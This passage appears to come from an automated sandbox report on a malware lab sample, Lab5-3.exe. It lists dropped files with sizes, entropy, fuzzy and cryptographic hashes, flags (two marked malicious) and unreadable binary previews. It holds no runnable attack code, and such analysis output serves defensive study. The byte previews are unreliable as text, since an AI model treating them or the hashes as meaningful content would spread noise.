                                                                                                          Entropy (8bit):7.989768162650308
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:gbxtAT9H6om0GqdUFVin1/Ln8xIBlVVCdGR2u+RW6oQtb:UIaom0GwCVi1/IxAVoc6vZ
                                                                                                          MD5:9922A3E340105DA864341DA9880B538A
                                                                                                          SHA1:106F49C0E10D2546DB4C5F972CACE4A101332D35
                                                                                                          SHA-256:A0A62D2D781281C600702EA471D9BC3A4C238D42C008EC24D7D6717AB7261C4A
                                                                                                          SHA-512:8E8E20E211CC01AFE248F20B4F0ECA379BF324CDE2DF2D7B748B4E7AEB0C2C08F84C48680B2D0DF76FD3318E49E928D597B6FF6AE6CAD24CBA0509A9EBFE99DC
                                                                                                          Malicious:false
                                                                                                          Preview:.^..K...G..FH....;.....|.\4.I.8...=g.L....wr...a..#..`/......g.fP......z\.K.{a.#....:.......jp.<...k{.`./.."...`9H.3Q......sy....mx.U3hZ(..2..d....N....S......._E...9.1.y!q.........Z2..= .qdM.Y...^@.ck?1l.89..<.&......5z^...5*........~....Kf.k.......sv.V.q..........\i..Y.6w..q.z.['.L.c.*.@..z?+..`........:P.........Yu.8.T.S.....D..2W.da2.\ypi..M.>......=..K.ptl..C.C.@.p...~.......!.;.l..yU.........,P..w."I...H....dWM.:........b`.2.6F`2.B...DF...p.!...bXe.......f...D)(...u).........l....6.CMo..{....I.E.a..+...c..Q...0...d]...h.Lo..w..w....g.%.F.b.b..I3........>.).....`$....k..:..8>...S........!qB.......=.u)...L...w....H.x&@.oPz..!..6.0....<%.Q.4Lx...j....L. 6.4....t.......:4.iR/B...G{....@..F6.g.~-.....ZiFq.I.G._z.3[...S.h.&.pp.{j.&..^...g...^....c./.a>...W......]...1..Z.....8...1..}C...#.....U.h6T.t...'..v......e.....#..d..4C.{!.l..J|.`'.2E.cf(u..5#}......R....p.....!..bT..=A.{......br..<."...!....."oB.N..Z.y.e_....*...*1W.f.sDYAv....v.A..$ 2r[}
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7872
                                                                                                          Entropy (8bit):7.978208041129294
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:oc/Xw9c1B5V1LfSYdwA0YG881mO/56/uFenL0Cb:Lvayz1wq/81TUmFeLtb
                                                                                                          MD5:6253DAC52ACB1AA2D8E54BB3546641EC
                                                                                                          SHA1:847C6F7862D2443E5A9ED89EFD4C4269C6DE00FC
                                                                                                          SHA-256:4E0E8CC5D8B33EABF1C70853BED0D34CA33BAE1EB81B787D094C227EEC05D476
                                                                                                          SHA-512:A24D75F7D65667510F70375E0DC4B2EDE17B9DCAD7F7E6A37118B72F92759FBE83427A62A4C0CD89EC28755E1B2BA01064BCBFB4B5F99329EEFD5E838293E7AC
                                                                                                          Malicious:false
                                                                                                          Preview:.....u.."K...@d...N..Z..l.....p..2.{.R..|..T|s;8*..V...p..'j.;3..?..nbQ..3.I...]..yc.`..8~..|.....m)z.O....K...W....*.h.F6.............K|....M....1.s.Z.z....c.......>i.#...%...Z..[.`..>.6.........^.p..&.*...m..q...=....h...T.=....w.+`!..o.s.$...........t..#../M~..b.nUT.`.j.0......H:.)`/.v|..e.CD..7.Y*_..t.A..4n.....4........)EQ....E.vB..7...<.Q4....U+.2......I....Q..O.L_e*.f..,......?..)..+.8R..i>t..X.M......X.3D._.:..W_.^.1.P.......w.2/....d...P......\&.cU.%2[..!w....p......9!. ....q........>.46..-p.I ..l.ulXM...<.a....O.y0F..Y.L..".,k..e.)M...^nYLp..0.....\.......A..I!...D..}...=...kep..<.0.Sc.L...(....i..^?.....l....`..B8/[|t........6O..@<..+{..$5oXi. ."....&.Nc..\..L...2...5.u.Q.\.e..Xk..KL.H.. ?ZvjO...Q.M2.*3C.h...Y`.o.......F.e..~~$fzYp>......=.2..GS.$V...[..........gK.OOl.1z.2Pa......Ls......$.......%6....T.*. .&....J7./.?p.A...(.......|....d.C..i...3.u.HAH...U.i...:J.N.....C8...4...."I...;Cy...s..@./....G.uG.4.....mPM..>....Y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39360
                                                                                                          Entropy (8bit):7.994626051438534
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:DQruc/E6CMmEubacAnb0rBmM7eda89wIOcw2UC3zk48tvjlK7aRV8Z:DD9lMmkcwTAe0KhlUJ7vjMc8Z
                                                                                                          MD5:A3BDFA29A10E0CB8890C85822ED700A4
                                                                                                          SHA1:D43D2E971624B76C776BEB097AAAA993DFBECB89
                                                                                                          SHA-256:34DCC0844C01AF51E0E3926190C5AC4BF7246CAE1D55822E69A105C9C0767530
                                                                                                          SHA-512:557623391602BD945FC253EF7E2D31A0900462581CC9FC8935F6BC009AB2CF51CD64BDA8135F57622FE7B7D36387358E1E2A448D6CBC408E025D98EB48BDB0A5
                                                                                                          Malicious:true
                                                                                                          Preview:.l.N;.....@.8.J..h.......%..+...I....>o.O`T...'........}._.T.,m~.....$....+..t...A.Z..L....lzu..UJ.F.Y...N...&............-.q,...#[.5.L.'.b.A.@..`.<.e..2'.....$/..X3....P.....T..\.Vs....\l.,..W.TK...p.L.=.:....=<....0.J.o<.U .$....jD."..u.....b...kB...$..D......D....xB3}.).p...,..-.nk..5#o5]....]............*g.y..`...o.oWKn.z...+..Oq......k...0.jS6..y..{.k?5.p.k.1..~e..>....[.....'......._.D"....S@b|..$~8.b..{z.3.....EL...v*../0........H....6p..*....e:..ga2.<...0.j........Q.........|d.^..4........9..(*..$8I./........Wc.`.......g...'L/u....b.}..a.*.....W......;H...gs.na..Z.<..PX...u...:G@.e:..x3-.....p&.\....X.d.......&}iH?.f.wV..m.7.7?L._..}.c...4...&....pw.S{0.6ka......w..J/..^.o.=.o..<.....Y...l...^.1.....C-#%wD.a....../^.x..O.c....7......2Iv..._...%..T....3n..SL.kS...G[..cQ.?...f..+..nO{..3.Vu\.g.@t..o..x'.v..f..@a.B..>..87k*.....=.S^;A(...E.?&...>).".t....u'.<.o6...T.\.:.J..9T..F3.&A.U....f.8...].z.\.A..V.Q......75>f..s.C
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.90665840017026
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LSxhFtPXOT+9ZLOHfUTid3hBaUoSGFcmeykEdEElU92i:s/K+3dGx0uKeY2ElUJ
                                                                                                          MD5:4E025F535106B428C3ACA04603C81610
                                                                                                          SHA1:0C10640A28ACDE09E9739C8D1C771BD54F3B8100
                                                                                                          SHA-256:F6A70AFEBACB80B67FAB7C6ABA79EEA5F53E0927D1285E2857CD4C6090CBB010
                                                                                                          SHA-512:9C79C2344BB1D7CB62F6EE850BD42D893246C415964AB7AD38FBD8081906C6E4FA41C8477EF581A16B96E97451A4279137DF1B19494CD98544381D22D4F05126
                                                                                                          Malicious:false
                                                                                                          Preview:@w..*..0.&D...T......;..q...s^R. .0..8.V{....,...u{Wvz....\g.5...... 6..seu.c.&.{g7Xy...[......?N...].c.G....I!...H.P........l.....J....I..,G.(.[o8.$CH......,c..It..(.{....r.....z..+...+9t.^.U.l.. Lth.AL..If\r...{l..iU\P.~d...@].....S..H:>.S..*.I.."...(..H.V.v=...!.J....W.T...c..H..,J..0\.........5......$....k.[\?.K.hg..Lc..K.9.;u..*l...`.FyxD..R A[.[.p......IwL.4(n..I.jI[.%2.`..Q.....\].el|.gL9uR...bA`-.K.p.`..T.....Ya.V.AQ.^,.zk...~..K..S.....l.@o'......4...o6.R.C..~...4p|?|k..Q.c...P.j..+#pgHz...2.]..j.....MY.I..8A..c....X...U.<I.>..}._..,^.Y..].<.....1...Na...vy:.M.Q.S.......&......Bh.`.uI~_..d#k......E.6.@.v....6.?.i9...8....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3440
                                                                                                          Entropy (8bit):7.950912250006549
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iWw7xeGqjkAELUF+a/XGgGx0uKeY2ElUJ:Zwxiz+a/2T0Cb
                                                                                                          MD5:B9F7E4C0B5DFFFF922328AE5F740D978
                                                                                                          SHA1:6FBD28EE16F561A0CD5ADE2C7145CB92423F34FD
                                                                                                          SHA-256:3F802F763DCE4523A0405023780E82B55C70F5FA8E4A19D2DF4463D87367D395
                                                                                                          SHA-512:1C19854503ACBEC68CB53E380CDC1045B855DDE786ADB6380D3B0BDB133109C150775472E5ED8C6439DA5CE1BC726545429DA4A933C224337CA94439580C5904
                                                                                                          Malicious:false
                                                                                                          Preview:K..wHI7.y.{.q.qE.o...T.........[mt.t..'Ui.Cdnl...?...$........CH.H...G6-..?.e.....Z.....!ol.k..I.1)2$&].R.....sk..[^g^t..G...;..p5..N......%...=..v...v...g.2......\,....d.]....@ .UG.F..m..2RVZ...5......7:9.$0@...b./.|.>++7..n.-pI0K.6yN.(...g.>X...9.E2.In......s.f..."t..2.Xs..8.im4..v.f.E[S...~j........%..Q.i"Bt.....S....o)$..M....OfH.^./...*0..pV..)."}...3.9.I54.M.k..+.M=.|.S.....l.W.>J..%........s.o...D...(.;qF..4O..3.g..8.......4.BN0...|Li....8.........+(?...qw.....P[@......J....^...lTW.2...#..98ELS|..............1..1..AQ.,.+........J..j..V5E..W.../..>..RO.....H.Z....3.g......T.kK.j`..K.J~.....%p...._......^y.V.=:....B....C<....Q.............]0....4.....!m..K.Y~.`..Jrqe...'.#T.l..E...@.....:....aW:.?...V...+....T.sHS+._^.Q.0.G...y...>...+_h.cS.&._J.c?u....ym?...I/.<.Y.aL.d.....O*....t.At....H.%..Ei..0m3.\.<.IH.......R.q.=....>..t..6h`...].h....&|~.}_.......zB0....O.........5..."...)..y.)rp.].......E.....|3......2C.?.U.Dj.n...%N
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.914796836821373
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7MuSNwEzOuwzfn5lPh49plVHfUTid3hBaUoSGFcmeykEdEElU92i:7MGEzOzLa9eGx0uKeY2ElUJ
                                                                                                          MD5:9859CEC765615F519A82CC40FF821E44
                                                                                                          SHA1:435E613D61420C4FDB8677549173FA5C5F34CDAA
                                                                                                          SHA-256:44F74F5EEB88167D1E5AB49F6859999F84186BC9D6D005103F4F0B0A80F8ECA7
                                                                                                          SHA-512:1A47879BF1B3CAAE086F4CB75C85B2B7384A6129F36F99574C02AC2DA9CA78E7CC353B98AB1C97B0E809F3FBE5C0749C7F4874BC5BECDEB2AAEEF6D50334D53C
                                                                                                          Malicious:false
                                                                                                          Preview:.M`3.2... ......E.5\.K..v...r.S....;.!dZ........y)w.qz9.Q....N......>.mO.q$.^>P.....>D..+ag..".?u...5eI..../.G..:...a..Y+.....#M.....<fH3*N......}G<.O...{K.....=.h..A.-.nw...X.X....4.r....#{Hg.z.n..en.Q#r2.q;\.[.D..a.t..F..ow....U..V......,.c-....R...L.qC#3....b<.....s......)..}t.I....$..E....e....6.**.S.m].vtD.O..?.d1r.5.6.z.2.@........G.U...._KA0nG..o.g.....~..1.....IF...p.5....'#...~.2@..E,d.Y.s~....g._(@[...0E.....o.K..e?...V*......e.7l...RS)o~..(.v..;.T.K.....8p`..c..@...U.K..r.....t|.&...K..p..jNM.OxS..wM]..:8.BE..h.9l{\PJ....h.[@.lKR..r%.......-%.B...8.....q...W..k...n..;.a.#p.....Nn/..~.6..U)..H..Y7...f.Lk.....y.....@....P.7....W..M.6..d&.O...y.Z..^...:.^=\^Z......."...mR.&$B.^..U.t..e"|..d..A.....%..c...|t..#.y.IA..-....>.K.C..a.....]f;.....B....F9%.H..5J.....,S.%jl.Oj*.y.....'.e+.Y.....J.q.&.L....-..m.H.....Hs........>...3.".....9..5.....C..ZGi5......B|\.5...4.m..t.N...,...bR.b..ya.u....}......=.H._.3S..<}'.P.&.SH.#..P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.904193901314412
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:boGR8hA/LRQrsXr4x0HfUTid3hBaUoSGFcmeykEdEElU92i:18hA/SKuzGx0uKeY2ElUJ
                                                                                                          MD5:D555A909476D5D351961E9B1D3C87152
                                                                                                          SHA1:1F89D176F7D4F5705499D2144C4F18A98CEB3214
                                                                                                          SHA-256:5BD7F1584C6FF1AB0D1E15AEE78C7F4251EF7014AC4FC49A9C25BE04BF8F8212
                                                                                                          SHA-512:D233D1E2B0E5F14C9841B71A574CC798C793EE2562CA2626603CD240FC8F49C2911DC7F7DE7FF997F69256D8A895A22CA85BF907C975D73DD8C226F0A3C2F64A
                                                                                                          Malicious:false
                                                                                                          Preview:caG.......A.G...b..R............c.#.9.)<,....7.0$....[]...Q..Me#...?.../....p....Cr........x...}..2*.W.`h.!...u..h].&{HX".....)\9..-J.7..R.LjInU.D.V.....+tZ.u%..T..%...0[X$.P.D...}...=+arw}.....m....z.z(.U3.....3/e. I.+F..............i...#.....j....q....s.]9......g..Q.....3.@..Qp..9...ot...(.P1...'q.....M...@......O.#<j...$.&|..f..._.8....L>..}&....[..f.~..[q..!?.+..W..IeX.:..l.....y.D..\.[8.WJ......I.....\...>M)!.D.lA#/.z;NX6;.jU....8.e2.FXK..?..B2m..?...@..!....l.>hJ..|.y%EZ?..X..........2M...5"...O.j..Q3..K`x.$.D9........`S.]in...V.a...o/...z.b.<M...$6."...L7,..>.R...L2.J..k....7@.?...E..^...o..........Y}..L.#..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2976
                                                                                                          Entropy (8bit):7.9440299248634725
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Nl0DMzEWlUaNp07ToK8mScwvknxPoV6HfUTid3hBaUoSGFcmeykEdEElU92i:NOWlYvoK8mxbxPMVGx0uKeY2ElUJ
                                                                                                          MD5:E68DEC25E76AB0E24D6BA201A4875EDA
                                                                                                          SHA1:7C167D5D9C4A955A78F300E72B6FD21D99C90056
                                                                                                          SHA-256:7F130CFC1CAA6206A9739155E657F09A368CFA40AEB4262553DC09A5E31065C5
                                                                                                          SHA-512:E6E91B999E98736277A78F83564E38B56DDCCDB335A4D821C12EE816DA7FA7C8CF399CBD1181FDAD0DD0E2A02B77548103F4EDAC59B4F020F405000A76387BBB
                                                                                                          Malicious:false
                                                                                                          Preview:.........4.."B.' jX.'.K._.....h...?..2....-&...... ...+.Vq.e...&........L.m4..N.<....i"....yU. .XE..s.zT:8..[.U....=.0]S1..|..8.f..=.b[.c,..*..?..f..n.5.......Oy.6..F....Z+.B..Bv#...... 8..0..B.{.51..u|..L.<.?j.N..T..oq....C...'../....).n.?..7%..._2aY6.'....^...o..!.?.....k.S......ut.H.~.*..8o4..2U6$B..3.-iE..5*...0Q.R.6_2...b1.....S...\v.v.7.v.].U7k.?RL}]..gb.."+..s...N....2T..)Q....:.~];o..@R....Y.N...F.h...4..H_......9...{N?.......'..Z..i..Q @..+nH..J.yC...z.H...O..?.FC....}...a......#.. u.4A.Q..nd0_...{7}.......!v..x7.ZA7n.s.qq.`.]..>{...>VZ^!....5...K..?.6J.+h..f|...}h.2.........Yi..a.o(.,.:..b.d.8Is5...9...Kl.{}.{.....U....0.T{.S..Z[.....j]P.....S-....-..(.. N..;..l.z.w*&.a..l%>.^.Kd"e.&,....v....n....x7f[.\...^...@.....\..D..};.If..".\q.H6..{....z.8.lZ.X...w.\.!h.aA...TV..D?%.c.f.....gC..@R..4..Yi'?@...>...j.3Y...,.c..k...!.F....}..5Q....?.}.R...hx..#..uMQm.G.%....1.YMN:@.*......ty..d#..0.&@..............d......v...6....0.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36544
                                                                                                          Entropy (8bit):7.994596381770675
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:YOMpTeHDCrKxI+0UfxLoVD5OFifI+CRbXk4zHGV70l2lxZIxT2BVIAH0k5sYZ:0TejCrRdUxLofelVeI27GxiBLpsYZ
                                                                                                          MD5:DCD968FC93DDF24FDB0622A8EB81425B
                                                                                                          SHA1:BF6630BEC1F8784D940550B789E4F77E6A03B397
                                                                                                          SHA-256:5104DE47C5CA3ACB9ABC2C8835DC1217DB6041997CB264B1A21EAB3E5DEFECA5
                                                                                                          SHA-512:88CF37460553DCED23F04A5FA33D48611DBEF29916B83F1F9EC178C0A9D884597EB8A3992F0B893FCB6C7E202C3E028945C14818CCDEBFD9E4631D9E2C273978
                                                                                                          Malicious:true
                                                                                                          Preview:......:.fdY.n......V...4..+.Syn./.(...i.*.../W...Zf..{.8..R<...........&....X.....On....u...p......$>..Q_J..@:1=H|...z.K...dc.GH.zT}:..P...?.h)....Y......sy..:.f..uR....C.T.}6.b.hy...IxM.pO...+.j..PX....p.....,...7i~....OT..7:.../8JF..J...M.r.n.&...&....p$.....07q.o..n..+.|......Z,.......5U. ....7cEUW0.\....0..\.{u.-k.2....N.{u".i.Q\5GPm...Y.'t.A..#9kL(.K8yf..G......-....a.54....6.p.~Xy.L...\...6...........{/..~7Y....to......k~.vy.gKYQ.3:a.....W.*.#.z.j..e.(.x.....s.f:....+M.Q...s.b.1.<..Ax.U.nk..O...#....S..YK..L...@...i.o.A.;...y.#.x9.U0.#..hZ.*~..O.(f....9Lwc..T._X......C.E..Y...|...c.....!I.M.W..\...'U....\..#.*....Z......]...#..C.v|q..1qE.`E.:.k.Q...s ia|......O.......k]J|B....C..G.>&f...#..%...+.'.,...5.4...U%.Uf...Cdrd...y....r?...eL.&...k.8..Y....../V.Ll...\].>..D....~..?..A....'l.........w...RK.K3U.5}g..m.S_%.!........f.x\Wy..U....H..n....I...2.lk...B'.SB.=h].~....\r.R..<...:2.*.4....t.~S.....tn.4..Dk7...W...?..]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.915884970088892
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4vm2chYr3lf9SN3kGSHfUTid3hBaUoSGFcmeykEdEElU92i:cEYTlFSN00Gx0uKeY2ElUJ
                                                                                                          MD5:7C3C665B5B5FBF3CC1DEC92144621452
                                                                                                          SHA1:D327CF699E8BABED82EE86E8EB74419063F35127
                                                                                                          SHA-256:1F94FEE1CD358FC46177775C0F1AFC76DB1DF625A92C2F8129E262FD301B93CD
                                                                                                          SHA-512:5080BE10B4327C46238DCC04F0421F65EF1B59ECE020FCB57A5912F5375245806CFEFA4EFE8CD86C0D47AB00AD01947977E440A6108B707F24C5646BB3D07E34
                                                                                                          Malicious:false
                                                                                                          Preview:.v....^....3#....Eg....oW_FZt4n...z.....PDe.1Of..=..},D.L..{..uL.~..]T.7H.:{.!qZI.s@)..}...A........Lq/N..~.J.+.#'*2<.....X.|1..y..8.).Ij.6..~).y$..G.X.9y..V. Y...k.m.....O....G.9B...|...@M.<....1....FA..g..o......F...^v...s..*.....;J'.!......&......K.T..n&...Ie......W.c.F.....W.oD"..YLg...6..Q5..h..mN..g$...X..t.dQ.G.!..{..X..pY.=..i!.C=.....S`jw...q5@j.(..<.....&}$...w.....>s..{...9.D.........c........1.`$ c..p.4.]z;.._.;E.F...8g....v.+{.{.)".?..6.....i.....#.%...!p.JE.b5..{o.XPG.=$..@[.+?.}.E..|.Ip...;r.z.D...4.U<H.o......7...[.%2.kku...x8[6j.{&?.J........Dt[..8n..F6(...r.KCc.......<.........$.u.w?....t&......g...|...B....JgQs.l"E.&O.s.tV.....+f.N{U.$z............q...g......'.:.J...*......V.lEX....7.]..z.3.Y.b)....G.sW..._.. ./..; ..QxO6.G.$...ch|........N.:..1....Zjz.Jv-B,..8...8).aD.U<.. {....Z..%."k+....pW.>....K.G.........M"..........!&Lz.r....%.I........._.4ABVW..6O.......!..w.s.....kJ.X...+y..+=....R.X.*..K...t.^..{.g.X~[..pu.5.CC
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8400
                                                                                                          Entropy (8bit):7.977438819650047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:zV4f8iNG7G1cgkxysIGzs0Cx56GJsgCamf0Cb:zV4p7mgkxnRXCBZmftb
                                                                                                          MD5:95F60F932DFD2E6C1A4A4563DB423B1A
                                                                                                          SHA1:C1184CE436B24015233F746F9E1BFDEE55DDD08F
                                                                                                          SHA-256:B42F850FDA8A5AE7853EAD29DD2A186272E3F2CC8A072DBCCA83565C0A4BA8DC
                                                                                                          SHA-512:289EFD75AC651F5B8866A59492202E445EC3BA2097959A684FEAD9D0101A2008010D03A251118EE625CE0E0A7BBAF6C20A145FD3613F8F4A53BFB2EBC7AC240C
                                                                                                          Malicious:false
                                                                                                          Preview::.".. I..`."v.#^.-n..v.HE..........0...}..|r..<F.?Q...__k...nM...k:..R~....r.....gi...B..DF>...7.9..9.....e..y...\W..z@6..yZ.............H.oV.b..8...X.k.....cs.c.W.W*..j.^.7.....A3....H._..E.f...C..i...b.7Y[f.%-.9.FW.d.G.=.2M...Vc....1.&K.6`......<..?Z.tb%.P1..._}...m.....).....J....S...5.5..f.JIW...*.....K..F.....c.2..WL.<h.HR`......E.....7.K..{..l.J.....R`/............_.......q.."1..l.)mb.?...]w..l..7MvtG]sa..un.[.^...{.4+..H...Aq...(.TW....rB.4...L......Y..[h.}...=(..w....gU..%.APgL.....I....W...-..A.].O".-(.z<.....q...Tl..bE...#...V..a[m......../7..-.Da.L{Jr.....>...I...V...G...6@x.e..a.c.....~.e.X..v.4#w)|.p(Ac'...n..S./..7....J.9..|.^.I..U|L..V.g...._..(......L...6.dJ.0M..:C.8...#Gp.h..[.'.(.su.%..G.....{.vc.(dd....x..PR...&......m.G.:...V>...z1Wu..-.N..h..6e? ..r.Z[>...u.l.......r...bb.....I..:'......@.\...Q.n..7...J.4..sp.)=~.H.2...o...)V.vK=...7iW.. .&..&.R....0..KN...8.Fr.....tb.>X.$#..S)............7..@.y......|j.... ._j.-o.*.*..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7888
                                                                                                          Entropy (8bit):7.9756906062176345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:x5B78dkivcnymICO9lHZsCYCumgrBorIq6XLp0Cb:xH8kLymIx9lHZsCYCaGIqktb
                                                                                                          MD5:F15DDB40FE25F888642D2F9CC497D50C
                                                                                                          SHA1:99C2A29EAB32D0AC8BA550487C02D43927FE799A
                                                                                                          SHA-256:429BFE5C3818C4DEF4C6104CA7D29E670F7F191F697ED6E82EC11794420BBF15
                                                                                                          SHA-512:59B63274397A3979384395FE8AFC115D720721F2E9C24B6DB897A74161275FA640A894763ECF3AD97F2DADE71B0709B3A5A3546CD4F24C257F936758198CA882
                                                                                                          Malicious:false
                                                                                                          Preview:q.&E..\I.}....`.......L.{z...=..........B3.YW.h.tN...o........SF.k.2x*.#.0L[3.+..H.f...&.$..PA.FCsTWA...u....[..F...y_i.`P...m_....f.>.s..i.a.c.$u.cV.....}.7f.d.[.o..B..t'VX...D.m\<.[.4.v|.q..;]n.)...9.1Fj0.{....I.6.al.B;.].!2.".z[....}1.f.[{..^rH.....:.H.....1.....UmF.............q.C.......,.f".....>S..$....MS5z.t...'KM.I.........w...9..+...r.UcK.k..l...wpJ.......S....-......|.#.......0...7v.. ..E..8~.3#{.%b....FZ.L.|..w.....L(.>..hqx.......1..ewH..M.~..P...l./.3(.G..,H..5ag...p9}e.O...P.N..Q..\.j.k.......u.....9...B..b,~.........$=.~.7..k..&.Q...s.....((.r.)..^F.6...F;i.k<_0.K.9]...q.[...5E.R...{+....2%...b...)\.+.....-C......A... :^..,S#O.,.p..I.].L.G.Me......yNv......u.+!...4E^.i.U....."..?e.[..c..r...J..G......e.....C..d.)....d6........_.....i.^.%.s.R...~I.[...<..M.@.....$.Lz.q<.`...f..........u..R4..M.T.'.J#.[._..,.6.l;S....L.:..?......=.F~.`.u..u....._..e..pj.o.!H......Y...CP..`..:...I.<m`....v{.../..5.X...#..Q.._..[R._.+..$&.?..s~D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.974608860640092
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ZcA/IYEfSAg9vevFcx8drLFarVaezV1+RyHZ/PCHIm68UqPcgSv0Gx0uKeY2ElUJ:WwMSAg9mcOLFaRa8VbPCHId8VPcgK0Cb
                                                                                                          MD5:20C9681D0474D9E8CCD4EEAC5F92EF44
                                                                                                          SHA1:9DCE5FCF9E89129A128797BE5797AC876830F582
                                                                                                          SHA-256:C3C45BEEEE7BBCA765D6B650038E38E1740A1BB62C2A79AF0A8498EE61478B72
                                                                                                          SHA-512:83331081D017036D0B79EDCB6DE6C1030F7359E1345DB18FC1D62B00A2D268A21199ABC25BC62D87357944C523B958FB0640B910A1D950A1B1AF85A3B8D537B7
                                                                                                          Malicious:false
                                                                                                          Preview:x..(j.>.vS.....@....y;...xC...Z`..j....X...7a...*W.I.G)~..~W..x...GG..N.y..p....vA..<...=.qJ...2g..LZ.:......:HX.'.o....Y....F...@....h~w#T^.e...f.yZ.yK.N,m.K>Y...E:..A....(.<.d...."...B.R..n..={k....|.+..\......B.Qoe..>y6..,..ag.U8...'.@VG...d.V../pF..^m...c]w.K}..W......;....O`..+.../i.....K..[[175..Vw..?TH....e.....[..m'...1...l.4!.l.j...p..tV...X2.Ilr..l.'..v...Z1.m'.'#?....).>.&..o....\e.PIb......i...O..oC;.93...nM....;.._...........CZ.2...2..%..`...@..\....u.R....um..P....k.N+.....=.0...R.bz..1.F,......Lg....Y.........X...-..5Y..'.o.z...0.....rU.N.....7.8.J.......F.......@..S.Aw..q.....{.e......C.w7...d...loh..y0....Y..p...]._...B..e.Y..]!...u.Ceh....t.@.w....5..a...;...E.-m..3....m.4.Y.K...b.'..D.^......n...!...l.l:...vr..#....r/......Q...gp:..0aQ.=....:.8.dq}s.#.......tw...T:/.X])....&.....!..R.%.lL.]Z..i.<<........x..........Y..Lqm^.v.+..k......z.8|...-k....A..Aj.....U:...|....n......*..1H....K....N.U....{.RG5.3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7920
                                                                                                          Entropy (8bit):7.9747827016902955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Vc68NBbwv/99RCo0ntoUAKmOEPfeVC0jQAhBuKZTtdyGf0Cb:m30v19RL0tYKmjPfiCiQAPuK1tdlftb
                                                                                                          MD5:71180DA9018EA07F42375CDBC4396AD2
                                                                                                          SHA1:9DA920900742F510227AE1F7D33384383F1033E5
                                                                                                          SHA-256:4567ED73C6BD6357328B7D63CD6D0291B8496EF16B69AFFD913A3B53139DAE8F
                                                                                                          SHA-512:F15D17C61BB0A4ABACAD590BA0EB9ECBF74371B91BED804FBE47EAB2601919B09C87E82608083B10966A7CB83F558E503BF96F6472244EC2007EEBF64EB22414
                                                                                                          Malicious:false
